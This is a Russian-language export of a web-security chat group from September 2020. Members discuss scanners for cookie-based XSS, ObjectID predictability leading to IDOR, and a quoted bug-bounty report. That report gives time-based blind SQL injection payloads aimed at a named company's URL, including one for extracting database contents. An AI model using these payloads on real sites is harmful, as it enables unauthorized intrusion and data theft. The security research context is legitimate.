Size: a a a

2020 September 10

B

Bo🦠oM in WebPwnChat
Не юзал, напиши в саппорт)
источник

pc

pa3riot c0de in WebPwnChat
Кто-нибудь знает сканер для cookie based xss? Пример ошибки: https://portswigger.net/web-security/dom-based/cookie-manipulation/lab-dom-cookie-manipulation
Проверил сканеры Burp, AppSpider, Acunetix, XSStrike - ненаход.
AppScan, Netsparker - находят, но только при условии что есть возможность установки cookie. Соответственно crlf и wildcard они не учитывают. Нужно чтобы в каждом url устанавливались cookie с инжектором типа sessionid=<script>. Пробовал написать скрипт для Netsparker, но он не работает. Может быть есть какая надстройка у сканеров, которую я не вижу или скрипт на github? Кстати Burp в своей же лаборатории не находит Blind SQL и XSS некоторые, хотя тот же Netsparker c этим справляется.
источник

D

Disx in WebPwnChat
pa3riot c0de
Кто-нибудь знает сканер для cookie based xss? Пример ошибки: https://portswigger.net/web-security/dom-based/cookie-manipulation/lab-dom-cookie-manipulation
Проверил сканеры Burp, AppSpider, Acunetix, XSStrike - ненаход.
AppScan, Netsparker - находят, но только при условии что есть возможность установки cookie. Соответственно crlf и wildcard они не учитывают. Нужно чтобы в каждом url устанавливались cookie с инжектором типа sessionid=<script>. Пробовал написать скрипт для Netsparker, но он не работает. Может быть есть какая надстройка у сканеров, которую я не вижу или скрипт на github? Кстати Burp в своей же лаборатории не находит Blind SQL и XSS некоторые, хотя тот же Netsparker c этим справляется.
Это все last версии продуктов
источник

D

Disx in WebPwnChat
?
источник

pc

pa3riot c0de in WebPwnChat
Смотря что, но как минимум prelast
источник

SN

S N in WebPwnChat
источник

SN

S N in WebPwnChat
Steps to reproduce:
Getting two states for boolean based sql injection
Error - https://www.innogames.com/'
No error - https://www.innogames.com/''
Crafted POC
https://www.innogames.com/'xor(if(now()=sysdate(),sleep(10),0))or'
Advanced payload for data extraction
https://www.innogames.com/'xor(if(mid(database(),1,1)=0x41,sleep(63),0))or'
источник

SN

S N in WebPwnChat
там написано что отчет не полностью открыт, но наверно endpoint спрятан, так как ну не может же быть скуля в корне сайта, как показано в примере https://www.innogames.com/'
источник

BF

Billy Fox in WebPwnChat
S N
Steps to reproduce:
Getting two states for boolean based sql injection
Error - https://www.innogames.com/'
No error - https://www.innogames.com/''
Crafted POC
https://www.innogames.com/'xor(if(now()=sysdate(),sleep(10),0))or'
Advanced payload for data extraction
https://www.innogames.com/'xor(if(mid(database(),1,1)=0x41,sleep(63),0))or'
Чё за хуйня о_О
источник

BF

Billy Fox in WebPwnChat
Не-не, может быть, если там, например, админ дебил слегка и для аналитики каждое телодвижение юзера в базу кладёт
источник

BF

Billy Fox in WebPwnChat
То есть тупо эвентлог апача/нджинкса в мускул кладётся
источник

q

q|z in WebPwnChat
S N
там написано что отчет не полностью открыт, но наверно endpoint спрятан, так как ну не может же быть скуля в корне сайта, как показано в примере https://www.innogames.com/'
"Есть многое на свете, друг Горацио...."
источник

BF

Billy Fox in WebPwnChat
Блять, вот реально же просто инжекть каждый пейлоад из словаря в каждое поле и надейся на удачу. Никогда не знаешь, что там на бэкенде вообще.
источник

N

Nilson in WebPwnChat
Подскажите а objectid в mongodb генерируется совсем случайно.
источник

N

Nilson in WebPwnChat
Ну там для генерации ид первые сколько то байт это timestamp, а потом уже случайное значение?
источник

s

s̢̍̌͗ͧͫ͊ͧͫͮ̂̒̇̅̌̐͆́͡... in WebPwnChat
Nilson
Подскажите а objectid в mongodb генерируется совсем случайно.
Вроде недавно была статья об этом?
источник

s

s̢̍̌͗ͧͫ͊ͧͫͮ̂̒̇̅̌̐͆́͡... in WebPwnChat
A BSON ObjectID is a 12-byte value consisting of a 4-byte timestamp (seconds since epoch), a 3-byte machine id, a 2-byte process id, and a 3-byte counter
источник

N

Nilson in WebPwnChat
Спасибо, значит из 3 байт и получился idor😊
источник
2020 September 11

P

PM in WebPwnChat
https://iz.ru/1058706/anna-urmantceva/ushcherb-ot-vzloma-oblaka-mozhet-byt-razmerom-s-natcionalnuiu-ekonomiku

к теме про блэков, которая тут когда-то была)
источник

A

Aba in WebPwnChat
Дааа))) симку без паспорта купить нельзя, ага))))) в каждой подворотне продают, подходишь да покупаешь за копейки без лишних вопросов)))
источник